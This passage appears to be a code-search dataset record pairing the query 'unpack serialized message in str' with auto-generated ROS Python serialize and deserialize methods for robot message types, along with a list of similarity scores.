len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n buff.write(_struct_i.pack(self.model_aligned.track.id))\n length = len(self.model_aligned.track.pose)\n buff.write(_struct_I.pack(length))\n for val1 in self.model_aligned.track.pose:\n _v57 = val1.position\n _x = _v57\n buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))\n _v58 = val1.orientation\n _x = _v58\n buff.write(_struct_4d.pack(_x.x, _x.y, _x.z, _x.w))\n length = len(self.model_aligned.track.pose_headers)\n buff.write(_struct_I.pack(length))\n for val1 in self.model_aligned.track.pose_headers:\n buff.write(_struct_I.pack(val1.seq))\n _v59 = val1.stamp\n _x = _v59\n buff.write(_struct_2I.pack(_x.secs, _x.nsecs))\n _x = val1.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(self.model_aligned.track.pose_projected)\n buff.write(_struct_I.pack(length))\n for val1 in self.model_aligned.track.pose_projected:\n _v60 = val1.position\n _x = _v60\n buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))\n _v61 = val1.orientation\n _x = _v61\n buff.write(_struct_4d.pack(_x.x, _x.y, _x.z, _x.w))\n length = len(self.model_aligned.track.pose_resampled)\n buff.write(_struct_I.pack(length))\n for val1 in self.model_aligned.track.pose_resampled:\n _v62 = val1.position\n _x = _v62\n buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))\n _v63 = val1.orientation\n _x = _v63\n buff.write(_struct_4d.pack(_x.x, _x.y, _x.z, _x.w))\n length = len(self.model_aligned.track.pose_flags)\n buff.write(_struct_I.pack(length))\n pattern = '<%sI'%length\n buff.write(struct.pack(pattern, *self.model_aligned.track.pose_flags))\n length = len(self.model_aligned.track.channels)\n buff.write(_struct_I.pack(length))\n for val1 in self.model_aligned.track.channels:\n _x = val1.name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(val1.values)\n buff.write(_struct_I.pack(length))\n pattern = '<%sf'%length\n buff.write(struct.pack(pattern, *val1.values))\n _x = self\n buff.write(_struct_3I.pack(_x.data_aligned.header.seq, _x.data_aligned.header.stamp.secs, _x.data_aligned.header.stamp.nsecs))\n _x = self.data_aligned.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n 
buff.write(_struct_i.pack(self.data_aligned.id))\n _x = self.data_aligned.name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(self.data_aligned.params)\n buff.write(_struct_I.pack(length))\n for val1 in self.data_aligned.params:\n _x = val1.name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val1\n buff.write(_struct_dB.pack(_x.value, _x.type))\n _x = self\n buff.write(_struct_3I.pack(_x.data_aligned.track.header.seq, _x.data_aligned.track.header.stamp.secs, _x.data_aligned.track.header.stamp.nsecs))\n _x = self.data_aligned.track.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n buff.write(_struct_i.pack(self.data_aligned.track.id))\n length = len(self.data_aligned.track.pose)\n buff.write(_struct_I.pack(length))\n for val1 in self.data_aligned.track.pose:\n _v64 = val1.position\n _x = _v64\n buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))\n _v65 = val1.orientation\n _x = _v65\n buff.write(_struct_4d.pack(_x.x, _x.y, _x.z, _x.w))\n length = len(self.data_aligned.track.pose_headers)\n buff.write(_struct_I.pack(length))\n for val1 in self.data_aligned.track.pose_headers:\n buff.write(_struct_I.pack(val1.seq))\n _v66 = val1.stamp\n _x = _v66\n buff.write(_struct_2I.pack(_x.secs, _x.nsecs))\n _x = val1.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(self.data_aligned.track.pose_projected)\n buff.write(_struct_I.pack(length))\n for val1 in self.data_aligned.track.pose_projected:\n _v67 = val1.position\n _x = _v67\n buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))\n _v68 = val1.orientation\n _x = _v68\n buff.write(_struct_4d.pack(_x.x, _x.y, _x.z, _x.w))\n length = len(self.data_aligned.track.pose_resampled)\n buff.write(_struct_I.pack(length))\n for val1 in self.data_aligned.track.pose_resampled:\n _v69 = val1.position\n _x = _v69\n buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))\n _v70 = val1.orientation\n _x = _v70\n buff.write(_struct_4d.pack(_x.x, _x.y, _x.z, _x.w))\n length = len(self.data_aligned.track.pose_flags)\n buff.write(_struct_I.pack(length))\n pattern = '<%sI'%length\n buff.write(struct.pack(pattern, *self.data_aligned.track.pose_flags))\n length = len(self.data_aligned.track.channels)\n buff.write(_struct_I.pack(length))\n for val1 in self.data_aligned.track.channels:\n _x = val1.name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(val1.values)\n buff.write(_struct_I.pack(length))\n pattern = '<%sf'%length\n buff.write(struct.pack(pattern, *val1.values))\n buff.write(_struct_9d.pack(*self.R))\n buff.write(_struct_3d.pack(*self.T))\n _x = self\n buff.write(_struct_df.pack(_x.dist_rot, _x.dist_trans))\n except struct.error as se: self._check_types(se)\n except TypeError as te: self._check_types(te)", "def serialize(self, buff):\n try:\n _x = self\n buff.write(_struct_3I.pack(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs))\n _x = self.header.frame_id\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n 
buff.write(_struct_9B.pack(_x.dvl_sts, _x.svs_sts, _x.fog_sts, _x.nav_sts, _x.bat_sts, _x.t_sts, _x.h_sts, _x.p_sts, _x.water_sts))\n except struct.error as se: self._check_types(se)\n except TypeError as te: self._check_types(te)", "def serialize(self, buff):\n try:\n _x = self\n buff.write(_get_struct_3I().pack(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs))\n _x = self.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_get_struct_3I().pack(_x.obstacleinfo.header.seq, _x.obstacleinfo.header.stamp.secs, _x.obstacleinfo.header.stamp.nsecs))\n _x = self.obstacleinfo.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(self.obstacleinfo.pos)\n buff.write(_struct_I.pack(length))\n for val1 in self.obstacleinfo.pos:\n _x = val1\n buff.write(_get_struct_2f().pack(_x.x, _x.y))\n length = len(self.obstacleinfo.polar_pos)\n buff.write(_struct_I.pack(length))\n for val1 in self.obstacleinfo.polar_pos:\n _x = val1\n buff.write(_get_struct_2f().pack(_x.angle, _x.radius))\n _x = self\n buff.write(_get_struct_3I().pack(_x.oppinfo.header.seq, _x.oppinfo.header.stamp.secs, _x.oppinfo.header.stamp.nsecs))\n _x = self.oppinfo.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(self.oppinfo.pos)\n buff.write(_struct_I.pack(length))\n for val1 in self.oppinfo.pos:\n _x = val1\n buff.write(_get_struct_2f().pack(_x.x, _x.y))\n length = len(self.oppinfo.polar_pos)\n buff.write(_struct_I.pack(length))\n for val1 in self.oppinfo.polar_pos:\n _x = val1\n buff.write(_get_struct_2f().pack(_x.angle, _x.radius))\n length = len(self.robotinfo)\n buff.write(_struct_I.pack(length))\n for val1 in self.robotinfo:\n _v1 = val1.header\n buff.write(_get_struct_I().pack(_v1.seq))\n _v2 = _v1.stamp\n _x = _v2\n buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs))\n _x = _v1.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val1\n buff.write(_get_struct_7i().pack(_x.AgentID, _x.targetNum1, _x.targetNum2, _x.targetNum3, _x.targetNum4, _x.staticpassNum, _x.staticcatchNum))\n _v3 = val1.pos\n _x = _v3\n buff.write(_get_struct_2f().pack(_x.x, _x.y))\n _v4 = val1.heading\n buff.write(_get_struct_f().pack(_v4.theta))\n buff.write(_get_struct_f().pack(val1.vrot))\n _v5 = val1.vtrans\n _x = _v5\n buff.write(_get_struct_2f().pack(_x.x, _x.y))\n _x = val1\n buff.write(_get_struct_5Bf().pack(_x.iskick, _x.isvalid, _x.isstuck, _x.isdribble, _x.current_role, _x.role_time))\n _v6 = val1.target\n _x = _v6\n buff.write(_get_struct_2f().pack(_x.x, _x.y))\n length = len(self.ballinfo)\n buff.write(_struct_I.pack(length))\n for val1 in self.ballinfo:\n _v7 = val1.header\n buff.write(_get_struct_I().pack(_v7.seq))\n _v8 = _v7.stamp\n _x = _v8\n buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs))\n _x = _v7.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n buff.write(_get_struct_i().pack(val1.ballinfostate))\n _v9 = val1.pos\n _x = _v9\n buff.write(_get_struct_2f().pack(_x.x, _x.y))\n _v10 = 
val1.real_pos\n _x = _v10\n buff.write(_get_struct_2f().pack(_x.angle, _x.radius))\n _v11 = val1.velocity\n _x = _v11\n buff.write(_get_struct_2f().pack(_x.x, _x.y))\n _x = val1\n buff.write(_get_struct_2B().pack(_x.pos_known, _x.velocity_known))\n _x = self\n buff.write(_get_struct_3I().pack(_x.coachinfo.header.seq, _x.coachinfo.header.stamp.secs, _x.coachinfo.header.stamp.nsecs))\n _x = self.coachinfo.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_get_struct_3B4f2h3B2I4f4B().pack(_x.coachinfo.MatchMode, _x.coachinfo.MatchType, _x.coachinfo.TestMode, _x.coachinfo.pointA.x, _x.coachinfo.pointA.y, _x.coachinfo.pointB.x, _x.coachinfo.pointB.y, _x.coachinfo.angleA, _x.coachinfo.angleB, _x.coachinfo.idA, _x.coachinfo.idB, _x.coachinfo.kickforce, _x.pass_cmd.pass_id, _x.pass_cmd.catch_id, _x.pass_cmd.pass_pt.x, _x.pass_cmd.pass_pt.y, _x.pass_cmd.catch_pt.x, _x.pass_cmd.catch_pt.y, _x.pass_cmd.is_passout, _x.pass_cmd.is_dynamic_pass, _x.pass_cmd.is_static_pass, _x.pass_cmd.is_valid))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize(self, buff):\n try:\n _x = self\n buff.write(_get_struct_3I().pack(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs))\n _x = self.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.Struct('<I%ss'%length).pack(length, _x))\n _x = self.sim_step\n buff.write(_get_struct_I().pack(_x))\n _x = self.type.data\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.Struct('<I%ss'%length).pack(length, _x))\n _x = self.parent_name.data\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.Struct('<I%ss'%length).pack(length, _x))\n _x = self.name.data\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.Struct('<I%ss'%length).pack(length, _x))\n _x = self\n buff.write(_get_struct_2f7dI().pack(_x.wall_time, _x.sim_time, _x.pose.position.x, _x.pose.position.y, _x.pose.position.z, _x.pose.orientation.x, _x.pose.orientation.y, _x.pose.orientation.z, _x.pose.orientation.w, _x.count))\n length = len(self.triggered)\n buff.write(_struct_I.pack(length))\n pattern = '<%sB'%length\n buff.write(struct.Struct(pattern).pack(*self.triggered))\n length = len(self.range)\n buff.write(_struct_I.pack(length))\n pattern = '<%sf'%length\n buff.write(struct.Struct(pattern).pack(*self.range))\n length = len(self.measurement)\n buff.write(_struct_I.pack(length))\n pattern = '<%sf'%length\n buff.write(struct.Struct(pattern).pack(*self.measurement))\n length = len(self.sensed_objects)\n buff.write(_struct_I.pack(length))\n for val1 in self.sensed_objects:\n _x = val1.data\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.Struct('<I%ss'%length).pack(length, _x))\n _x = self.sensed_objects_map\n length = len(_x)\n # - if encoded as a list instead, serialize as bytes instead of string\n if type(_x) in [list, tuple]:\n 
buff.write(struct.Struct('<I%sB'%length).pack(length, *_x))\n else:\n buff.write(struct.Struct('<I%ss'%length).pack(length, _x))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize(self, buff):\n try:\n _x = self\n buff.write(_get_struct_3I().pack(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs))\n _x = self.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_get_struct_QBdB2I().pack(_x.step_num, _x.info_type, _x.predict.step_dt, _x.predict.trans_jacobian.column_major, _x.predict.trans_jacobian.rows, _x.predict.trans_jacobian.cols))\n length = len(self.predict.trans_jacobian.data)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(struct.pack(pattern, *self.predict.trans_jacobian.data))\n _x = self\n buff.write(_get_struct_B2I().pack(_x.predict.trans_noise_cov.column_major, _x.predict.trans_noise_cov.rows, _x.predict.trans_noise_cov.cols))\n length = len(self.predict.trans_noise_cov.data)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(struct.pack(pattern, *self.predict.trans_noise_cov.data))\n _x = self\n buff.write(_get_struct_B2I().pack(_x.predict.prior_state_cov.column_major, _x.predict.prior_state_cov.rows, _x.predict.prior_state_cov.cols))\n length = len(self.predict.prior_state_cov.data)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(struct.pack(pattern, *self.predict.prior_state_cov.data))\n _x = self\n buff.write(_get_struct_B2I().pack(_x.predict.post_state_cov.column_major, _x.predict.post_state_cov.rows, _x.predict.post_state_cov.cols))\n length = len(self.predict.post_state_cov.data)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(struct.pack(pattern, *self.predict.post_state_cov.data))\n _x = self\n buff.write(_get_struct_B2I().pack(_x.update.prior_state_cov.column_major, _x.update.prior_state_cov.rows, _x.update.prior_state_cov.cols))\n length = len(self.update.prior_state_cov.data)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(struct.pack(pattern, *self.update.prior_state_cov.data))\n length = len(self.update.prior_obs_error)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(struct.pack(pattern, *self.update.prior_obs_error))\n _x = self\n buff.write(_get_struct_B2I().pack(_x.update.obs_error_cov.column_major, _x.update.obs_error_cov.rows, _x.update.obs_error_cov.cols))\n length = len(self.update.obs_error_cov.data)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(struct.pack(pattern, *self.update.obs_error_cov.data))\n _x = self\n buff.write(_get_struct_B2I().pack(_x.update.post_state_cov.column_major, _x.update.post_state_cov.rows, _x.update.post_state_cov.cols))\n length = len(self.update.post_state_cov.data)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(struct.pack(pattern, *self.update.post_state_cov.data))\n length = len(self.update.state_delta)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(struct.pack(pattern, *self.update.state_delta))\n length = len(self.update.post_obs_error)\n buff.write(_struct_I.pack(length))\n 
pattern = '<%sd'%length\n buff.write(struct.pack(pattern, *self.update.post_obs_error))\n _x = self\n buff.write(_get_struct_B2I().pack(_x.update.obs_jacobian.column_major, _x.update.obs_jacobian.rows, _x.update.obs_jacobian.cols))\n length = len(self.update.obs_jacobian.data)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(struct.pack(pattern, *self.update.obs_jacobian.data))\n _x = self\n buff.write(_get_struct_B2I().pack(_x.update.obs_noise_cov.column_major, _x.update.obs_noise_cov.rows, _x.update.obs_noise_cov.cols))\n length = len(self.update.obs_noise_cov.data)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(struct.pack(pattern, *self.update.obs_noise_cov.data))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize(self, buff):\n try:\n _x = self\n buff.write(_struct_3I.pack(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs))\n _x = self.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self.namespace\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self.id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(self.prefixes)\n buff.write(_struct_I.pack(length))\n for val1 in self.prefixes:\n _x = val1.name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val1.prefix\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(self.imports)\n buff.write(_struct_I.pack(length))\n for val1 in self.imports:\n length = len(val1)\n if python3 or type(val1) == unicode:\n val1 = val1.encode('utf-8')\n length = len(val1)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *val1))\n else:\n buff.write(struct.pack('<I%ss'%length, length, val1))\n _x = self.address.room_nr\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self.address.floor_nr\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self.address.street_nr\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n 
buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self.address.street_name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self.address.city_name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(self.objects)\n buff.write(_struct_I.pack(length))\n for val1 in self.objects:\n _v1 = val1.header\n buff.write(_struct_I.pack(_v1.seq))\n _v2 = _v1.stamp\n _x = _v2\n buff.write(_struct_2I.pack(_x.secs, _x.nsecs))\n _x = _v1.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val1.id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val1.type\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _v3 = val1.size\n _x = _v3\n buff.write(_struct_3f.pack(_x.x, _x.y, _x.z))\n _v4 = val1.pose\n _v5 = _v4.position\n _x = _v5\n buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))\n _v6 = _v4.orientation\n _x = _v6\n buff.write(_struct_4d.pack(_x.x, _x.y, _x.z, _x.w))\n _x = val1.part_of\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(self.actions)\n buff.write(_struct_I.pack(length))\n for val1 in self.actions:\n _x = val1.id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val1.type\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n buff.write(_struct_B.pack(val1.asserted))\n _x = val1.object_acted_on\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(val1.subactions)\n buff.write(_struct_I.pack(length))\n for val2 in val1.subactions:\n length = len(val2)\n if python3 or type(val2) == unicode:\n val2 = val2.encode('utf-8')\n length = len(val2)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *val2))\n else:\n buff.write(struct.pack('<I%ss'%length, length, val2))\n _x = val1\n buff.write(_struct_bB.pack(_x.quantification, _x.unordered))\n length = len(self.object_properties)\n buff.write(_struct_I.pack(length))\n for val1 in 
self.object_properties:\n _x = val1.id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val1.subject\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val1.object\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(self.data_properties)\n buff.write(_struct_I.pack(length))\n for val1 in self.data_properties:\n _x = val1.id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val1.subject\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n buff.write(_struct_B.pack(val1.value_type))\n _x = val1.value\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize(self, buff):\n try:\n _x = self\n buff.write(_get_struct_6d2I2iB().pack(_x.x, _x.y, _x.z, _x.yaw, _x.v_des, _x.a_des, _x.t_start.secs, _x.t_start.nsecs, _x.duration.secs, _x.duration.nsecs, _x.relative))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def to_buffer(self) -> bytearray:\n packet = bytearray()\n packet.extend(\n struct.pack(\n \"!ccccHH\",\n \"D\".encode(\"ascii\"),\n \"L\".encode(\"ascii\"),\n \"E\".encode(\"ascii\"),\n \"P\".encode(\"ascii\"),\n int(self.type),\n self.len,\n )\n )\n return packet" ]
[ "0.6972838", "0.6802016", "0.6796291", "0.67317253", "0.66948694", "0.66847515", "0.6658851", "0.6626311", "0.66227144", "0.6618303", "0.6607444", "0.65361035", "0.6529462", "0.65220654", "0.64863104", "0.6467052", "0.64530367", "0.6438432", "0.6427743", "0.6426063", "0.63947827", "0.637155", "0.6370058", "0.63681626", "0.6365958", "0.63556087", "0.635341", "0.6336435", "0.6329306", "0.6322275", "0.63218606", "0.63185257", "0.6306401", "0.62988025", "0.6281811", "0.6272117", "0.62678283", "0.6263905", "0.626265", "0.6260801", "0.6259295", "0.62568295", "0.62566996", "0.62555534", "0.6250422", "0.6249969", "0.6216801", "0.62154055", "0.6210305", "0.62070805", "0.62065965", "0.6200813", "0.6192115", "0.6191173", "0.6176995", "0.6174274", "0.61577916", "0.6152228", "0.61469287", "0.6144135", "0.61402714", "0.6133335", "0.61313534", "0.6130928", "0.6127834", "0.61178756", "0.6117536", "0.6114875", "0.61143404", "0.61098206", "0.6100491", "0.6100394", "0.6096276", "0.6087428", "0.6085069", "0.60646605", "0.6061217", "0.6061037", "0.60604405", "0.6055247", "0.6047422", "0.6044676", "0.604425", "0.604425", "0.60435164", "0.60401994", "0.6039911", "0.6038519", "0.6036742", "0.6035997", "0.6029169", "0.60147244", "0.60146034", "0.6014108", "0.60076547", "0.60048294", "0.59783775", "0.5971153", "0.59585917", "0.59584385", "0.5954125" ]
0.0
-1
unpack serialized message in str into this message instance
def deserialize(self, str): try: if self.header is None: self.header = std_msgs.msg.Header() if self.goal_id is None: self.goal_id = actionlib_msgs.msg.GoalID() if self.goal is None: self.goal = moveit_msgs.msg.MoveGroupGoal() end = 0 _x = self start = end end += 12 (_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: self.header.frame_id = str[start:end].decode('utf-8') else: self.header.frame_id = str[start:end] _x = self start = end end += 8 (_x.goal_id.stamp.secs, _x.goal_id.stamp.nsecs,) = _get_struct_2I().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: self.goal_id.id = str[start:end].decode('utf-8') else: self.goal_id.id = str[start:end] _x = self start = end end += 12 (_x.goal.request.workspace_parameters.header.seq, _x.goal.request.workspace_parameters.header.stamp.secs, _x.goal.request.workspace_parameters.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: self.goal.request.workspace_parameters.header.frame_id = str[start:end].decode('utf-8') else: self.goal.request.workspace_parameters.header.frame_id = str[start:end] _x = self start = end end += 60 (_x.goal.request.workspace_parameters.min_corner.x, _x.goal.request.workspace_parameters.min_corner.y, _x.goal.request.workspace_parameters.min_corner.z, _x.goal.request.workspace_parameters.max_corner.x, _x.goal.request.workspace_parameters.max_corner.y, _x.goal.request.workspace_parameters.max_corner.z, 